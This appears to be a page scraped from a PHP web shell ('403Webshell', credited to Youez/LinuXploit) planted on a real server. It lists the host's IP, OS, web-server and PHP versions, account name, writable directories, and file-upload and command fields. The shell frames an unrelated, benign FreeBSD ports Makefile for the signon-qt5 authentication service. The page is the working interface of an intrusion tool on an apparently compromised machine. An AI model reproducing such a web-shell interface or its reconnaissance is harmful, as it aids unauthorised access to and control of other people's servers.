403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/sysutils/signon-qt5/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/sysutils/signon-qt5/Makefile
PORTNAME=	signon
DISTVERSION=	8.60
PORTREVISION=	1
CATEGORIES=	sysutils kde
PKGNAMESUFFIX=	-qt5
DIST_SUBDIR=	KDE/${GL_ACCOUNT}

MAINTAINER=	kde@FreeBSD.org
COMMENT=	D-Bus service performing user authentication
WWW=		https://gitlab.com/accounts-sso/signond

LICENSE=	LGPL20
LICENSE_FILE=	${WRKSRC}/COPYING

USES=		compiler:c++11-lang gettext gl pathfix pkgconfig python qmake \
		qt:5 tar:bz2
USE_GL=		gl
USE_QT=		core dbus gui network sql testlib xml \
		buildtools:build qmake:build

# gitlab variables
USE_GITLAB=	yes
GL_ACCOUNT=	accounts-sso
GL_PROJECT=	signond
GL_COMMIT=	07d45498ad374d9e8e4ff6a886f4b4bb850c0cb5

OPTIONS_DEFINE=	DOCS

pre-configure:
	#make it find qdbusxml2ccp (as ${QT_BINDIR} is not in PATH)
	${REINPLACE_CMD} -e 's,qdbusxml2cpp,${QT_BINDIR}/qdbusxml2cpp,' \
		${WRKSRC}/src/signond/signond.pro
	#correctly install signond.conf
	${REINPLACE_CMD} -e '/conf_file.path/ s,/etc/,${LOCALBASE}/etc/,' \
		${WRKSRC}/src/signond/signond.pro
	#find moved signond.conf
	${REINPLACE_CMD} -e 's,/etc,${LOCALBASE}/etc,' \
		${WRKSRC}/src/signond/signondaemon.cpp

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit